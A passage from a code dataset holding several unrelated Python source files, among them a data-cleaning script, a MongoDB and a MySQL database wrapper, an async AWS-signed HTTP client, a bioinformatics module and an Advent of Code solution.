filter_attention_checks(df, experiment_type)\n print(\"After filtering attention check fails: \", len(df))\n # Filter people who didn't complete experiment\n df = filter_incomplete(df)\n print(\"After filtering incomplete: \", len(df))\n # Filter people who finished too fast or slow\n df = filter_by_time(df)\n print(\"After filtering by time: \", len(df))\n # Drop duplicate trials (for intra-user reliability)\n df = drop_duplicates(df)\n print(\"After dropping duplicates: \", len(df))\n # Standardize column names, obscure IDs, and drop irrelevant columns and NaN rows\n df = filter_cols(df, experiment_type)\n df[\"experiment_type\"] = experiment_type\n \n return df\n \ndef get_experiment_type(experiment):\n if \"normal\" in experiment:\n return \"surface-normals\"\n elif \"segmentation\" in experiment:\n return \"segmentation\"\n elif \"depth\" in experiment:\n return \"depth\"\n\ncleaned_db = conn[\"mlve_results\"]\ncleaned_db.drop_collection(\"results\")\ncleaned_col = cleaned_db[\"results\"]\n\ntotal_records = 0\nfor experiment in experiments:\n print(\"*\"*80 + \"\\n\" + f\"\\t\\Processing Experiment: {experiment}\\n\" + \"*\"*80)\n exp_col = db[experiment]\n df = load_experiment(experiment)\n\n experiment_type = get_experiment_type(experiment)\n df = filter_df(df, experiment_type)\n total_records += len(df)\n print(\"=\"*80 + \"\\n\" + f\"\\t\\tExperiment: {experiment}:\\n\\t\\tTotal records: {len(df)}\\n\" + \"=\"*80)\n\n cleaned_col.insert_many(df.to_dict(\"records\"))\n \nprint(\"Total records: \", total_records)","repo_name":"yifr/mlve","sub_path":"results/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21250864993","text":"import pygame \n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, position, rotation, image):\n super().__init__()\n self.image = image \n self.position = position\n self.rect = pygame.rect.Rect(0, 0, self.image.get_width(), self.image.get_height())\n self.speed = 4\n self.rotation = rotation\n ","repo_name":"Oyvindyt/oblig3-inf1400","sub_path":"1400-Oblig-3/BulletClass.py","file_name":"BulletClass.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5560371983","text":"\nimport torch\nimport torch.nn as nn\n\n\n #Hessian products\n\nlinear = nn.Linear(10, 20)\nx = torch.randn(1, 10)\ny = linear(x).sum()\n\ngrad = torch.autograd.grad(y, linear.parameters(), create_graph=True)\n\nv = grad[0].clone().requires_grad_(True)\n\nz = grad[0] @ v.t()\n\nz.mean().backward()\nprint(linear.weight.grad)\nprint(z.grad_fn)\nprint(z.grad_fn.next_functions)\nprint(z.grad_fn.next_functions[1][0].next_functions)\nprint(z.grad_fn.next_functions[1][0].next_functions[0][0].next_functions)\n'''\n\n((None, 0), (, 0))\n((, 0),)\n'''\n\n","repo_name":"mrluin/Pytorch-Forums-Code-Snippet","sub_path":"Hessian_products.py","file_name":"Hessian_products.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"30886087315","text":"from datetime import datetime\nfrom typing import Dict\n\nfrom logx.common.common_object import (\n CustomDate, Multiple, DatabaseResult, Result, Customer\n)\nfrom .settings_handler import DatabaseSettings\nfrom logx.common.algo import update_process\n\nfrom pymongo import MongoClient\nfrom rich.table import Table\nfrom rich.console import Console\nfrom rich.text import Text\nfrom rich import box\n\nimport dns\n\n\n# Current DNS fix\ndns.resolver.default_resolver=dns.resolver.Resolver(configure=False)\ndns.resolver.default_resolver.nameservers=['8.8.8.8']\n\n\nclass Database:\n\n def __init__(self) -> None:\n self.settings = DatabaseSettings()\n\n if not self.settings.srv:\n client = MongoClient(\n host = self.settings.host,\n port = self.settings.port,\n username = self.settings.user,\n password = self.settings.passw,\n authSource = self.settings.database\n )\n else:\n client = MongoClient(self.settings.host)\n\n self.db = client[self.settings.database]\n self.main = self.settings.record_collection_name\n self.test = self.settings.dev_collection_name\n self.history = self.settings.history_collection_name\n self.history_test = \"modified_test\"\n\n def get(self, date: str | CustomDate | list[str], test: bool = False, **kwargs) -> DatabaseResult | bool:\n \"\"\"\n Optional:\n c: Collection Names\n show_table: bool (Default to False) Display result as a table\n \"\"\"\n\n show_table = kwargs.get(\"show_table\", False)\n\n def internal_func(date: str | CustomDate) -> Multiple | dict[None, None]:\n if type(date) == str:\n date = CustomDate(date)\n\n collection = self.db[kwargs.get(\"c\", self.main)] if not test else self.db[self.test]\n result = collection.find_one(\n {\n 'day' : date.result['data'][0],\n 'month' : date.result['data'][1],\n 'year' : date.result['data'][2]\n }\n )\n\n if result:\n m = Multiple()\n m.repack(result)\n\n return m\n else:\n return {}\n\n def display(m: Multiple) -> None:\n table = Table(show_footer=True, box=box.SIMPLE_HEAD)\n console = Console()\n\n table.add_column(\"No\")\n table.add_column(\"Name\", overflow=\"crop\")\n table.add_column(\"Transaction\", footer=Text(m.total_idr, justify=\"center\"))\n table.add_column(\"Transfer\")\n table.add_column(\"Diff\")\n table.add_column(\"Note\")\n\n for num, items in enumerate(m.records):\n table.add_row(str(num + 1), items.cname, items.trx_idr, items.trf_idr, items.diff_idr, items.note)\n\n console.print(table, justify=\"center\")\n\n a_result = []\n if type(date) == list:\n for i in date:\n res = internal_func(i) if internal_func(i) else {}\n\n if show_table and res:\n display(res)\n elif not res:\n a_result.append(f\"{CustomDate(i).result['display']} not found!\")\n else:\n a_result.append(res)\n else:\n res = internal_func(date) if internal_func(date) else {}\n\n if show_table and res:\n display(res)\n elif not res:\n return DatabaseResult(Result.S_NFOUND, {})\n else:\n return DatabaseResult(Result.S_SUCCESS, res)\n\n if not show_table:\n return DatabaseResult(Result.S_SUCCESS, a_result)\n\n def get_all(self, test: bool = False) -> DatabaseResult:\n collection = self.db[self.main] if not test else self.db[self.test]\n holder = []\n\n result = collection.find()\n for i in result:\n res = Multiple()\n res.repack(i)\n\n if res.records:\n holder.append(res)\n\n return DatabaseResult(Result.S_SUCCESS, holder)\n\n def save(self, data: Multiple, test: bool = False) -> DatabaseResult:\n if not data:\n return DatabaseResult(Result.E_VAR, False)\n\n if self.get(data._date, test).C_RESULT == Result.S_SUCCESS:\n return DatabaseResult(Result.S_EXISTS, False)\n\n collection = self.db[self.main] if not test else self.db[self.test]\n result = collection.insert_one(data.unpack())\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n\n def update(self, data: Multiple, test: bool = False) -> DatabaseResult:\n\n r = self.get(data._date, test)\n if r.C_RESULT == Result.S_SUCCESS:\n history = self.db[self.history] if not test else self.db[self.history_test]\n collection = self.db[self.main] if not test else self.db[self.test]\n\n old_data = r.VALUE.unpack()\n unpacked_data = data.unpack()\n\n old_data['modified_at'] = datetime.today()\n changed = update_process(r.VALUE, data)\n\n old_data['data'] = changed['data']\n old_data['update_mode'] = changed['operation']\n del old_data['total']\n\n print(old_data)\n\n history.insert_one(old_data)\n result = collection.update_one({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n }, { '$set': {\n 'data': unpacked_data['data'],\n 'total': unpacked_data['total'],\n 'note': unpacked_data['note'],\n 'modified_date': datetime.today()\n }})\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n else:\n return DatabaseResult(Result.S_NFOUND, False)\n\n def delete(self, date: str | CustomDate, test: bool = False) -> DatabaseResult:\n\n r = self.get(date, test)\n if r.C_RESULT == Result.S_SUCCESS:\n collection = self.db[self.main] if not test else self.db[self.test]\n unpacked_data = r.VALUE.unpack()\n\n result = collection.delete_one({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n })\n\n if result.acknowledged:\n rs = self.get(date, c=\"history\")\n if rs.C_RESULT == Result.S_SUCCESS:\n c_rs = self.db[\"history\"]\n c_rs.delete_many({\n 'day': unpacked_data['day'],\n 'month': unpacked_data['month'],\n 'year': unpacked_data['year']\n })\n\n return DatabaseResult(Result.S_SUCCESS, result.acknowledged)\n else:\n return DatabaseResult(Result.S_NFOUND, False)\n\n\n def get_customers_list(self) -> DatabaseResult:\n\n collection = self.db['customer']\n c_list = {}\n\n for items in collection.find():\n cs = Customer(items['name'], items['total'])\n cs.id = items['_id']\n c_list[items['name']] = cs\n\n return DatabaseResult(Result.S_SUCCESS, c_list)\n","repo_name":"anfaro/logx","sub_path":"logx/data/database_handler.py","file_name":"database_handler.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40586124925","text":"# -*- coding: utf-8 -*-\n# __author__ = 'haidong.gu'\n# __modify__ = '2019/4/11'\n\nimport os\nimport shutil\nimport gevent\nfrom biocluster.core.exceptions import OptionError\nfrom biocluster.module import Module\nfrom mbio.packages.metagenomic.common import link_file, link_dir\n\n\nclass ExtractReadsModule(Module):\n \"\"\"\n 抽取一定乘数的reads\n \"\"\"\n\n def __init__(self, work_id):\n super(ExtractReadsModule, self).__init__(work_id)\n option = [\n {\"name\": \"fastq_dir\", \"type\": \"infile\", \"format\": \"sequence.fastq_dir\"},\n {\"name\": \"fastq_list\", \"type\": \"infile\", \"format\": \"bacgenome.simple_file\"}, # list表,第一列为fastq前缀,第二列为碱基数(单位bp), 第三列为基因组大小(单位兆)\n {\"name\": \"depth_ctrl\", \"type\": \"bool\", \"default\": True}, # 是否需要做数据抽取\n {\"name\": \"depth_num\", \"type\": \"int\", \"default\": 150, \"min\": 10} # 抽取数据的乘数\n ]\n self.add_option(option)\n self.run_tools = []\n\n def check_options(self):\n \"\"\"\n 检查参数\n :return:\n \"\"\"\n # edit options check\n return True\n\n def run(self):\n super(ExtractReadsModule, self).run()\n self.run_check()\n\n def run_check(self):\n with open(self.option(\"fastq_list\").prop[\"path\"]) as file:\n lines = file.readlines()[1:]\n for line in lines:\n line = line.strip().split(\"\\t\")\n prefix, base, gsize = line\n self.logger.info(prefix)\n if self.option(\"depth_ctrl\"):\n self.check_then_run_extract(prefix, base, gsize)\n else:\n self.logger.info(\"direct put output\")\n self.direct_put_output(prefix)\n if len(self.run_tools) > 0:\n self.on_rely(self.run_tools, self.set_output)\n for tool in self.run_tools:\n tool.run()\n else:\n gevent.spawn_later(5, self.end)\n\n def check_then_run_extract(self, prefix, base, gsize):\n gsize_in_bp = float(gsize) * 1204*1204\n if float(base) / gsize_in_bp > self.option(\"depth_num\"):\n scale = self.option(\"depth_num\") * gsize_in_bp / float(base)\n self.logger.info(scale)\n self.run_seqtk(prefix, scale)\n else:\n self.direct_put_output(prefix)\n\n def run_seqtk(self, prefix, scale):\n file1 = prefix + \".clean.1.fq\"\n file2 = prefix + \".clean.2.fq\"\n tool = self.add_tool(\"bacgenome.seqtk\")\n tool.set_options({\n \"fastq\": os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file1),\n \"outfastq\": file1,\n \"scale\": scale\n })\n self.run_tools.append(tool)\n tool2 = self.add_tool(\"bacgenome.seqtk\")\n tool2.set_options({\n \"fastq\": os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file2),\n \"outfastq\": file2,\n \"scale\": scale\n })\n self.run_tools.append(tool2)\n\n def direct_put_output(self, prefix):\n file1 = prefix + \".clean.1.fq\"\n file2 = prefix + \".clean.2.fq\"\n link_file(os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file1), os.path.join(self.output_dir, file1))\n link_file(os.path.join(self.option(\"fastq_dir\").prop[\"path\"], file2), os.path.join(self.output_dir, file2))\n\n def set_output(self):\n \"\"\"\n 将结果文件连接到output文件夹下面\n :return:\n \"\"\"\n self.logger.info(\"设置结果目录\")\n for tool in self.run_tools:\n link_dir(tool.output_dir, self.output_dir)\n self.logger.info(\"设置seqtk结果成功\")\n self.end()\n\n def end(self):\n result_dir = self.add_upload_dir(self.output_dir)\n result_dir.add_relpath_rules([\n [\",\", \"\", \"结果输出目录\"],\n ])\n result_dir.add_regexp_rules([\n [\"\", \"\", \"\"]\n ])\n super(ExtractReadsModule, self).end()\n","repo_name":"bensonlew/rnawl","sub_path":"src/mbio/modules/bacgenome/extract_reads.py","file_name":"extract_reads.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} +{"seq_id":"33239837224","text":"\"\"\"Day 7: Handy Haversacks\"\"\"\nimport logging\nimport time\nfrom typing import Dict, List\n\nimport coloredlogs\n\nfrom src import DATA_PATH\n\nlog_fmt = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=log_fmt)\nlogger = logging.getLogger(__file__)\ncoloredlogs.install()\n\n\ndef load_day_7() -> List[str]:\n filename = DATA_PATH / \"day7\"\n with open(filename, \"r\") as file:\n return [line.strip() for line in file.readlines()]\n\n\ndef bag_contents(rules, list_of_bags):\n super_bags = []\n for rule in rules:\n target_bag, contents = [el.replace(\"bags\", \"\").strip() for el in rule.split(\"contain\")]\n if any([bag in contents for bag in list_of_bags]):\n super_bags.append(target_bag)\n return super_bags\n\n\ndef d7_p1(rules: List[str]) -> int:\n list_of_bags = [\"shiny gold\"]\n total_bags = [\"shiny gold\"]\n while list_of_bags:\n list_of_bags = bag_contents(rules, list_of_bags)\n if list_of_bags:\n total_bags.extend(list_of_bags)\n\n return len(set(total_bags)) - 1\n\n\ndef organize_bag_items(list_bags: List[str]) -> Dict[str, Dict[str, int]]:\n item_bags = {}\n for bag in list_bags:\n main_bag, contents = [el.replace(\"bags\", \"\").replace(\"bag\", \"\").strip() for el in bag[:-1].split(\"contain\")]\n if \"no other\" in contents:\n items = {}\n else:\n item_list = [el.strip() for el in contents.split(\",\")]\n items = {\" \".join(item.split()[1:]): int(item.split()[0]) for item in item_list}\n item_bags[main_bag] = items\n return item_bags\n\n\ndef pick_bags(items: Dict[str, Dict[str, int]], query: str) -> int:\n if not items[query]:\n return 0\n else:\n return sum(list(items[query].values()) + [v * pick_bags(items, k) for k, v in items[query].items()])\n\n\ndef d7_p2(rules: List[str]) -> int:\n item_bags = organize_bag_items(rules)\n total_bags = pick_bags(item_bags, \"shiny gold\")\n return total_bags\n\n\ndef day_7() -> None:\n logger.info(\"Day 7: Handy Haversacks\")\n rules = load_day_7()\n t1 = time.time()\n n_bags = d7_p1(rules)\n logger.info(f\"N° of bag colors: {n_bags}\")\n t2 = time.time()\n logger.info(f\"Task 1 completed in {t2 - t1} seconds\")\n n_bags_2 = d7_p2(rules)\n logger.info(f\"N° of bag colors (update): {n_bags_2}\")\n t3 = time.time()\n logger.info(f\"Task 2 completed in {t3 - t2} seconds\")\n","repo_name":"sboomi/advent-of-code","sub_path":"code/2020/python/src/day_7.py","file_name":"day_7.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"21088927087","text":"from http import HTTPStatus\nfrom typing import (\n Any,\n AsyncGenerator,\n Generator,\n Literal,\n Mapping,\n Optional,\n Sequence,\n TypeVar,\n Union,\n overload,\n)\n\nimport aiohttp\nfrom gyver.attrs import define\nfrom gyver.context import AsyncAdapter\nfrom gyver.url import URL\nfrom gyver.utils import lazyfield\n\nfrom gyver.aws.auth import AwsAuthV4\nfrom gyver.aws.credentials import Credentials\nfrom gyver.aws.exc import InvalidParam\nfrom gyver.aws.http.opts import Opts\nfrom gyver.aws.http.response import ResponseProxy\nfrom gyver.aws.typedef import GET, HEAD, POST, PUT, Services\n\nT = TypeVar(\"T\")\n\n\n@define(pydantic=False)\nclass AsyncAuthHttpClient:\n credentials: Credentials\n service: Services\n use_default_headers: bool = True\n verify_ssl: bool = True\n\n @lazyfield\n def aws_auth(self):\n return AwsAuthV4(\n self.credentials, self.service, self.use_default_headers\n )\n\n @lazyfield\n def session(self) -> aiohttp.ClientSession:\n session = aiohttp.ClientSession()\n session.verify = self.verify_ssl\n return session\n\n @property\n def is_closed(self):\n return self.session.closed\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, *_):\n await self.close()\n\n async def close(self):\n await self.session.close()\n\n async def do(self, opts: Opts[T]) -> T:\n response: aiohttp.ClientResponse = await self._methods[opts.method](\n self, **opts.kwargs()\n )\n return opts.response_handler(\n ResponseProxy(\n opts.url,\n headers=response.headers,\n status_code=HTTPStatus(response.status),\n content=await response.read(),\n )\n )\n\n async def iter(\n self, opt_generator: Generator[Opts[T], None, None]\n ) -> AsyncGenerator[T, None]:\n for item in opt_generator:\n yield await self.do(item)\n\n async def exhaust(\n self, opt_generator: Generator[Opts[T], None, None]\n ) -> Sequence[T]:\n return [await self.do(item) for item in opt_generator]\n\n async def exhaust_with_null(\n self, opt_generator: Generator[Opts, None, None]\n ) -> None:\n await self.exhaust(opt_generator)\n\n async def head(\n self,\n url: URL,\n headers: Optional[Mapping[str, str]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n headers = (\n headers\n if raw\n else self.aws_auth.headers(HEAD, url, headers=headers)\n )\n return await self.session.head(url.encode(), headers=headers)\n\n async def get(\n self,\n url: URL,\n headers: Optional[Mapping[str, str]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n headers = (\n headers\n if raw\n else self.aws_auth.headers(GET, url, headers=headers)\n )\n return await self.session.get(url.encode(), headers=headers)\n\n @overload\n async def post(\n self,\n url: URL,\n data: bytes = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ) -> aiohttp.ClientResponse:\n ...\n\n @overload\n async def post(\n self,\n url: URL,\n data: Mapping[str, Any],\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n *,\n raw: Literal[True],\n ) -> aiohttp.ClientResponse:\n ...\n\n async def post(\n self,\n url: URL,\n data: Union[bytes, Mapping[str, Any]] = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n if not raw:\n if not isinstance(data, bytes):\n raise InvalidParam(\n \"data\", data, \"Requests using data as mapping must be raw\"\n )\n headers = self.aws_auth.headers(\n POST, url, headers=headers, data=data\n )\n if files:\n if isinstance(data, bytes):\n raise InvalidParam(\n \"data\",\n data,\n \"Requests using files must have mapping as files\",\n )\n data = {**data, **files}\n return await self.session.post(\n url.encode(), data=data, headers=headers\n )\n\n async def put(\n self,\n url: URL,\n data: Union[bytes, Mapping[str, Any]] = b\"\",\n headers: Optional[Mapping[str, str]] = None,\n files: Optional[Mapping[str, bytes]] = None,\n raw: bool = False,\n ):\n headers = headers or {}\n if not raw:\n if not isinstance(data, bytes):\n raise InvalidParam(\n \"data\", data, \"Requests using data as mapping must be raw\"\n )\n headers = self.aws_auth.headers(\n PUT, url, headers=headers, data=data\n )\n if files:\n if isinstance(data, bytes):\n raise InvalidParam(\n \"data\",\n data,\n \"Requests using files must have mapping as files\",\n )\n data = {**data, **files}\n return await self.session.put(\n url.encode(), data=data, headers=headers, files=files\n )\n\n _methods = {\n GET: get,\n POST: post,\n PUT: put,\n HEAD: head,\n }\n\n\n@define(pydantic=False)\nclass AsyncAuthHttpAdapter(AsyncAdapter[AsyncAuthHttpClient]):\n credentials: Credentials\n service: Services\n use_default_headers: bool = True\n verify_ssl: bool = True\n\n async def is_closed(self, client: AsyncAuthHttpClient) -> bool:\n return client.is_closed\n\n async def release(self, client: AsyncAuthHttpClient) -> None:\n await client.close()\n\n async def new(self):\n return AsyncAuthHttpClient(\n self.credentials,\n self.service,\n self.use_default_headers,\n self.verify_ssl,\n )\n","repo_name":"guscardvs/gyver-aws","sub_path":"gyver/aws/http/asyncio.py","file_name":"asyncio.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"36889118039","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport copy\nimport MySQLdb\nimport MySQLdb.cursors\nfrom datetime import datetime\n\n\nclass Dmysql:\n def __init__(self, host: str, user: str, passwd: str, db: str, port: int = 3306, keep_connect: bool = False):\n self.host, self.port = host, port\n self.user, self.passwd, self.db = user, passwd, db\n self.query, self.__conn, self.keep_connect = '', None, keep_connect\n self.err, self.err_msg, self.allow_log = 0, None, False\n\n def connecting(self, db=None):\n if not db:\n db = self.db\n # print('MYSQL CONNECTION', db)\n return MySQLdb.connect(host=self.host, user=self.user, passwd=self.passwd, db=db, port=self.port,\n charset='utf8', cursorclass=MySQLdb.cursors.DictCursor)\n\n def connect(self):\n if not self.__conn:\n self.__conn = self.connecting()\n self._log_file('connection open')\n return self.__conn\n\n def close(self):\n if not self.keep_connect and self.__conn:\n self.__conn.close()\n self._log_file('connection close')\n self.__conn = None\n\n def query_scalar(self, query: str, data: dict = None, close: bool = True):\n result, rs = None, self.query_row(query, data, close=close)\n if rs and self.err == 0:\n rs2 = list(rs.values())\n if rs2:\n result = rs2[0]\n return result\n\n def query_row(self, query: str, data: dict = None, close: bool = True) -> dict:\n result, rs = None, self.execute(query, data)\n if rs and self.err == 0:\n result = rs.fetchone()\n if close:\n self.close()\n return result\n\n __OPERATORS = {'$eq': '=', '$gt': '>', '$gte': '>=', '$lt': '<', '$lte': '<=', '$ne': '<>'}\n\n # '$in': ' IN','$nin': ' NOT IN','$and': ' AND ', '$or': ' OR ', '$not': ' NOT ', '$nor': ' NOR'}\n\n def __dict2keys(self, data: dict) -> list:\n result = []\n for k, v in data.items():\n _operator = '='\n if isinstance(v, dict):\n for _k, _v in v.items():\n if _k in self.__OPERATORS:\n _operator = self.__OPERATORS[_k]\n result.append('%s%s%s' % (self.__prefix_field(k), _operator, self._dict_value(k)))\n return result\n\n def _qargs(self, qry: str, data: dict) -> str:\n for k, v in data.items():\n qry = re.sub(r':%s(\\s+|\\)|$|;|:|,|\\+|-|\\*|/)' % k, r'%s\\1' % self._dict_value(k), qry)\n # print('qry=', qry)\n return qry\n\n def chk_has(self, table: str, where: dict = None, close: bool = True, query: str = None) -> bool:\n if not query:\n where_query = ''\n if where:\n where_query = ' WHERE %s' % ' AND '.join(self.__dict2keys(where))\n query = 'SELECT 1 FROM %s%s' % (table, where_query)\n nquery = 'SELECT EXISTS(%s) AS has;' % query\n result = self.query_scalar(nquery, data=where, close=close)\n if result:\n return result > 0\n return False\n\n def query_table(self, query: str, data: dict = None, close: bool = True) -> list:\n result, rs = None, self.execute(query, data)\n if rs and self.err == 0:\n result = rs.fetchall()\n if close:\n self.close()\n return result\n\n @staticmethod\n def _dict_value(key):\n return '%(' + str(key) + ')s'\n\n def shell_exec(self, command: str):\n return os.system(\"mysql -u%s -p'%s' %s\" % (self.user, self.passwd, command))\n # _args = ['mysql', 'u%s' + self.user, 'p%s' + self.passwd, command]\n # return subprocess.Popen(_args, stdout=subprocess.PIPE).communicate()\n\n def database_create(self, dbname: str = None):\n if not dbname:\n dbname = self.db\n self.shell_exec('-e \"CREATE DATABASE IF NOT EXISTS %s;\"' % dbname)\n\n def database_exists(self, dbname: str):\n cur = self.connecting('INFORMATION_SCHEMA').cursor()\n return cur.execute(\"SELECT SCHEMA_NAME FROM SCHEMATA WHERE SCHEMA_NAME=\\'%s\\';\" % dbname) == 1\n\n def insert(self, table: str, data: dict, commit: bool = True, close: bool = True) -> int:\n fields = [self.__prefix_field(k) for k in data.keys()]\n query = 'INSERT INTO %s (%s) VALUES (%s);' % (\n table, ','.join(fields), ','.join(map(self._dict_value, data)))\n result, rs = -1, self.execute(query, data, commit=commit, regquery=False)\n if rs and self.err == 0:\n result = rs.lastrowid\n if close:\n self.close()\n return result\n\n @staticmethod\n def __prefix_field(field: str) -> str:\n return '`%s`' % field\n\n def _where4update(self, table: str, data: dict, where: dict = None):\n if data and isinstance(data, dict):\n # sets = ['%s=%s' % (self.__prefix_field(k), self._dict_value(k)) for k, v in data.items()]\n _qry = 'UPDATE %s SET %s' % (table, ','.join(self.__dict2keys(data)))\n if where:\n _dt, wheres = copy.copy(data), []\n for k, v in where.items():\n dk = k\n if k in _dt.keys():\n dk += 'dragonupdate'\n _dt[dk] = v\n wheres.append('%s=%s' % (self.__prefix_field(k), self._dict_value(dk)))\n return _qry + ' WHERE %s;' % ' AND '.join(wheres), _dt\n return _qry + ';', data\n\n def update(self, table: str = None, data: dict = None, where: dict = None, commit: bool = True, close: bool = True, query: str = None) -> int:\n result = -1\n if not query:\n query, _data = self._where4update(table, data, where=where)\n rs = self.execute(query, _data, commit=commit, regquery=False)\n else:\n rs = self.execute(query, data, commit=commit, regquery=True)\n if rs and self.err == 0:\n result = rs.rowcount\n if close:\n self.close()\n return result\n\n def delete(self, table: str = None, where: dict = None, commit: bool = True, close: bool = True, query: str = None) -> int:\n result = -1\n if not query:\n query = 'DELETE FROM %s' % table\n if where:\n # wheres = ['%s=%s' % (self.__prefix_field(k), self._dict_value(k)) for k, v in where.items()]\n query += ' WHERE %s;' % ' AND '.join(self.__dict2keys(where))\n rs = self.execute(query, where, commit=commit, regquery=False)\n else:\n rs = self.execute(query, where, commit=commit, regquery=True)\n if rs and self.err == 0:\n result = 1\n if close:\n self.close()\n return result\n\n def _log_file(self, message: str, data: dict = None):\n if self.allow_log:\n tnow = datetime.now()\n qfile = tnow.strftime('%m_%d_%H')\n import json\n with open('/home/dll/mysql/%s_%s.sql' % (self.db, qfile), 'a') as cw:\n cw.write('\\n/*%s*/\\t%s\\n' % (tnow.strftime('%H:%M:%S'), message))\n if data:\n cw.write('%s\\n' % json.dumps(data))\n\n def commit(self):\n try:\n self.connect().commit()\n self.err = 0\n except Exception as e:\n self.err = 500\n self.err_msg = str(e)\n print('ERR SQL', self.err_msg)\n\n def execute(self, query: str, data: dict = None, commit: bool = True, regquery: bool = True):\n # print('execute query=', query)\n # print('execute data=', data)\n if not query:\n self.err = 502\n self.err_msg = 'query is empty'\n else:\n if data and regquery:\n query = self._qargs(query, data)\n self.query = query\n try:\n conn = self.connect()\n csr = conn.cursor()\n if data:\n for k, v in data.items():\n if isinstance(v, dict):\n for _k, _v in v.items():\n if _k in self.__OPERATORS:\n data[k] = _v\n # print('QRY=', self.query, data)\n csr.execute(self.query, data)\n if commit:\n conn.commit()\n self.err = 0\n self._log_file(self.query, data)\n return csr\n except Exception as e:\n self.err = 500\n self.err_msg = str(e)\n print('ERR SQL', self.err_msg)\n # print(self.query, data)\n\n def __execute_table(self, query: str, close: bool = True) -> int:\n result, rs = -1, self.execute(query)\n if rs and self.err == 0:\n result = 1\n if close:\n self.close()\n return result\n\n def truncate(self, table: str, close: bool = True) -> int:\n return self.__execute_table('TRUNCATE TABLE %s;' % table, close)\n\n def droptable(self, table: str, close: bool = True) -> int:\n return self.__execute_table('DROP TABLE %s;' % table, close)\n","repo_name":"canhbx123/sola.api","sub_path":"common/dmysql.py","file_name":"dmysql.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72829976908","text":"import json\nfrom datetime import datetime, timedelta\n\n\n# 기존 json 파일 읽어오기\nwith open(\"./data_original.json\", 'r', encoding=\"utf-8\") as file:\n data = json.load(file)\n\nchat_data = []\nactor_list = [\"박지후\", \"윤찬영\", \"조이현\", \"로몬\", \"유인수\", \"이유미\", \"임재혁\"]\n# 데이터 수정\nfor i in data:\n for j in i:\n user_id = j[\"user\"][\"id\"]\n user_name = j[\"user\"][\"name\"]\n if user_name not in actor_list: continue\n text_id = j[\"id\"]\n time = j[\"created_at\"]\n b = datetime.strptime(time, '%Y-%m-%dT%H:%M:%S.%fZ')\n b = b + timedelta(hours=9)\n text = j[\"text\"]\n chat_data.append((b.strftime(\"%Y-%m-%d %H:%M:%S\"), user_name, text))\n print(j[\"text\"])\n\nprint(len(chat_data))\n\n\n# 기존 json 파일 덮어쓰기\nwith open(\"./actor.json\", 'w', encoding='utf-8') as file:\n json.dump(chat_data, file, indent=\"\\t\", ensure_ascii=False)","repo_name":"Jeongsj/AllOfUsAreDead","sub_path":"asset/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"37197690801","text":"import logging\n\nfrom agent_server.conftest import _deploy_resources, get_agent\nfrom utils import get_resource, log_contains, log_doesnt_contain, retry_limited\n\n\nasync def test_deploy_trigger(\n server, client, clienthelper, resource_container, environment, caplog, no_agent_backoff, async_finalizer\n):\n \"\"\"\n Test deployment of empty model\n \"\"\"\n caplog.set_level(logging.INFO)\n\n agent = await get_agent(server, environment, \"agent1\", \"agent5\")\n async_finalizer(agent.stop)\n\n version = await clienthelper.get_version()\n\n resources = [\n get_resource(version, agent=\"agent1\"),\n get_resource(version, agent=\"agent2\"),\n get_resource(version, agent=\"agent3\"),\n ]\n\n await _deploy_resources(client, environment, resources, version, False)\n\n async def verify(result, a1=0, code=200, warnings=[\"Could not reach agents named [agent2,agent3]\"], agents=[\"agent1\"]):\n assert result.code == code\n\n def is_deployed():\n return resource_container.Provider.readcount(\"agent1\", \"key1\") == a1\n\n await retry_limited(is_deployed, 1)\n log_contains(caplog, \"agent\", logging.INFO, f\"Agent agent1 got a trigger to update in environment {environment}\")\n log_doesnt_contain(caplog, \"agent\", logging.INFO, f\"Agent agent5 got a trigger to update in environment {environment}\")\n\n assert result.result[\"agents\"] == agents\n if warnings:\n assert sorted(result.result[\"metadata\"][\"warnings\"]) == sorted(warnings)\n caplog.clear()\n\n async def verify_failed(result, code=400, message=\"\", warnings=[\"Could not reach agents named [agent2,agent3]\"]):\n assert result.code == code\n\n log_doesnt_contain(caplog, \"agent\", logging.INFO, \"got a trigger to update\")\n if warnings:\n assert 